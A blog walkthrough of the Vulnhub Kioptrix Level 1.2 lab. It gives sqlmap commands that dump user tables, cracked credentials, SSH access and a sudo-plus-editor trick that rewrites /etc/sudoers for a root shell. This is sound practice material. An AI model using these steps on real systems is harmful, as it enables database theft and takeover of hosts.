Vulnhub靶机:Kioptrix_Level1.2

最新推荐文章于 2024-09-15 01:19:00 发布
最新推荐文章于 2024-09-15 01:19:00 发布
阅读量165 收藏 5
点赞数 3
文章标签: 大数据 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75569982/article/details/142220429
版权

信息收集

使用nmap主机发现靶机ip

kali ip 192.168.134.130

扫IP

使用nmap端口扫描发现靶机开放端口

nmap -A 192.168.134.156 -p 1-65535

打开网站,点击login,跳转到登录页面,发现该网站cms为:LotusCMS

访问 http://192.168.134.156/gallery

SQL注入

1、发现 url 中含 id 参数,sqlmap 测试SQL注入,存在

sqlmap -u "http://192.168.134.156/gallery/gallery.php?id=1" --batch

sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch --dbs			# 查询数据库名
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery --tables			# 查询gallery库下数据表
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users --dump		查询 user 表下用户
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --dump
 
# admin:n0t7t1k4
# dreg:0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)
# loneferret:5badcaf789d3d1d09794d8f021f40f0e (starwars)

getshell

尝试另两组用户名密码,发现可通过 ssh 远程连接

ssh -oHostKeyAlgorithms=+ssh-dss loneferret@192.168.134.156

提权

发现 loneferret 用户存在利用点

cat /etc/passwd

查看用户家目录

ls
cat CompanyPolicy.README

根据提示,执行命令

ssh -oHostKeyAlgorithms=+ssh-dss loneferret@192.168.134.156
 
find / -perm -u=s -type f 2>/dev/null
sudo -l
sudo /usr/local/bin/ht
//报错Error opening terminal: xterm-256color.则 export TERM=xterm
//ht编辑器修改/etc/sudoers:F3 --> 查找 /etc/sudoers --> 添加 /bin/bash --> F2 保存 --> F10 退出
 
sudo /bin/bash

提权成功

Ad
关注
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1082
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
KIOPTRIX: LEVEL 1.2 (#3)
Katarina__的博客
09-04 647
KIOPTRIX: LEVEL 1.2 (#3) 攻击机IP:192.168.253.143 靶机IP:192.168.253.144 一、信息收集 1、确定目标主机IP、开放端口 使用netdiscover确定网段内目标主机。 netdiscover -i eth0 -r 192.168.253.0/24 (主动探测网段内活动主机) 也可使用nmap扫固定网段 nmap -sP 192.168.253.0/24 找到ip后,可继续使用nmap探测此主机的开放端口等信息 nmap -n -
vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 307
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 387
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
vulnhubKioptrix : Level 1.2
wbplife的博客
07-29 297
使用了一个python版本的exp:GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit。将exp下载下来,使用web服务上传到靶机,编译执行,在/etc/passwd文件写入一个具有root权限的用户。使用searchsploit搜索LotusCMS的历史漏洞,发现该CMS版本为3.0时存在命令执行漏洞。运行这个编译过后的文件,设置密码123456,会自动生成一个用户,跳转到这个用户。监听444端口,因为从下载的文件说明中可知,监听端口必须是444。
Vulnhub靶机系列:Kioptrix: Level 1.3 (#4)
汗的博客
04-02 831
这次的是Vulnhub靶机: 这次的靶机Vulnhub靶机Kioptrix: Level 1.2 (#3) 靶机地址及相关描述 靶机地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ 靶机设置 这个靶机需要自己新建一个空的虚拟机 移除现在的硬盘,用靶机替换,开机。老规矩,用netdiscover和curl确定一下目标已经OK。 ...
【运维监控】Prometheus+grafana监控zookeeper运行情况
alanchanchn的专栏
09-11 1454
通过zookeeper自带的监控信息暴露出来,然后将数据收集到prometheus中,最后通过grafana的dashboard导入模板进行可视化
Flume:大规模日志收集与数据传输的利器
Casual_Lei的博客
09-14 1059
是一个分布式、可靠、可扩展的日志收集和聚合系统,设计的初衷是用于高效收集和传输大量日志数据。它通常用于将数据从各种数据源,如日志文件、应用服务器、甚至是消息队列,实时传输到大数据处理系统(如 Hadoop 的 HDFS、HBase 或 Kafka)。Flume 的一个重要特点是其“可插拔性”,可以灵活地配置不同的数据源(Source)和目标存储(Sink),通过中间通道(Channel)来实现可靠的数据传输。Apache Flume 是一个非常强大的工具,适用于大规模日志数据的实时收集和传输。
Elasticsearch7.x 集群迁移文档
happy_king_zi的博客
09-11 1030
同时检查当前运行集群状态是否为green。如果出现异常,可以配置discovery.zen.ping.unicast.hosts: [“10.200.112.149”, “10.200.112.151”,“10.200.112.153”,“172.31.2.84”, “172.31.0.147”,“172.31.0.94”],恢复当前关闭节点。操作顺序操作动作1。
【RabbitMQ】工作模式
weixin_73060900的博客
09-11 1123
对RabbitMQ工作模式的简单概述以及代码案例
滚雪球学SpringCloud[2.2]:Consul与Zookeeper服务注册
**My Coding Family**
09-14 968
在上一节【2.1 服务注册中心Eureka】中,我们探讨了 Netflix 开源的服务注册中心 Eureka 的核心概念及其在微服务架构中的应用。Eureka 通过提供服务注册与发现功能,帮助微服务之间高效通信,并且具备高可用性和扩展性。虽然 Eureka 在微服务架构中应用广泛,但并不是唯一的解决方案。除了 Eureka,还有其他非常优秀的服务注册中心,如Consul和Zookeeper,它们在不同的场景下各有优势。本节将详细介绍Consul和Zookeeper。
从AI到大数据,数字技术服务平台全栈赋能企业升级
smjt2024的博客
09-11 692
海量的数据中蕴含着丰富的信息和价值,数字技术服务平台能够收集、整理和分析这些数据,为企业提供精准的市场洞察和决策支持。企业可以通过参加树莓集团举办的培训课程和研讨会,了解最新的数字技术趋势和应用案例,提升自身的数字技术水平。从技术咨询、解决方案设计到系统实施和运维,数字技术服务平台为企业提供一站式的服务,让企业无需担心技术难题,专注于自身的核心业务。树莓集团的数字技术服务平台,以其先进的技术、专业的服务和丰富的经验,为企业提供了全栈赋能。在数字时代,让我们共同利用数字技术服务平台,开启企业升级的新篇章。
消息中间件有哪些常见类型
最新发布
weixin_57763462的博客
09-15 631
需要注意的是,这些类型并不是严格互斥的,有些消息中间件可能支持多种消息传递模式或结合了多种类型的特点。在这种模型中,消息被发送到特定的队列中,消费者从队列中取出并处理消息。在发布/订阅模型中,消息被发布到特定的主题(Topic)上,所有订阅了该主题的消费者都可以接收到这个消息。消息代理是一种更通用的概念,它涵盖了上述的点对点和发布/订阅模型,以及可能的其他消息传递模式。消息代理作为消息的存储和转发中心,负责消息的路由、过滤、持久化等功能。这类消息系统使用日志结构来存储消息,提供了极高的吞吐量和可扩展性。
大数据】探索怎么从一段话中解析关键信息(寄件人相关信息)
一个不断前行的程序者
09-12 638
通过使用Spacy的NLP功能,我们成功实现了从文本中提取姓名、地址和电话号码的功能。需要注意的是,这个简单的示例可能在处理复杂文本时效果不佳,实际应用中可能需要进一步的优化和训练。此外,对于电话号码的识别,我们简单地使用了数字长度作为判断依据,这并不准确。在实际应用中,我们可以使用正则表达式来更准确地识别电话号码。希望这个博客能够帮助你了解如何使用NLP技术实现文本信息解析功能。如果有任何疑问,欢迎在评论区留言讨论!
Java 学习路线:语言、框架、中间件与数据库
qq_64272546的博客
09-13 1575
Spring Boot 是 Spring 框架的子项目,可简化 Spring 应用的开发与配置。通过提供一系列默认配置和自动化配置功能,Spring Boot 极大地减轻了开发者的工作量。Spring Cloud 是一系列框架的集合,用于开发分布式系统和微服务架构。它涵盖了负载均衡、服务发现、配置管理、分布式追踪等功能。MyBatis-Plus 是 MyBatis 的增强工具,它在 MyBatis 的基础上提供了大量的易用功能,如单表 CRUD 操作、分页、代码生成器等,旨在简化数据库操作。
测试-Testcontainers
Flying_Fish_roe的博客
09-12 654
Testcontainers 允许你通过自定义 Docker 容器,适用于不在官方支持列表中的服务或应用。// 获取 Redis 的地址和端口 String address = redis . getHost();} } }// 获取 Redis 的地址和端口 String address = redis . getHost();} } }// 获取 Redis 的地址和端口 String address = redis . getHost();} } }
海量数据查找最大K个值:数据结构与算法的选择
许你安然的博客
09-13 1125
本文详细探讨了如何在海量数据集中查找最大的K个值,从基础的排序方法到高效的优先队列/堆方法,再到分布式计算框架的应用,以及一些优化策略。通过合理的数据结构和算法选择,我们可以大大提高处理大数据集的效率,确保在有限的时间内获得所需的结果。希望这些信息能够帮助开发者在实际项目中更好地应对大数据处理挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值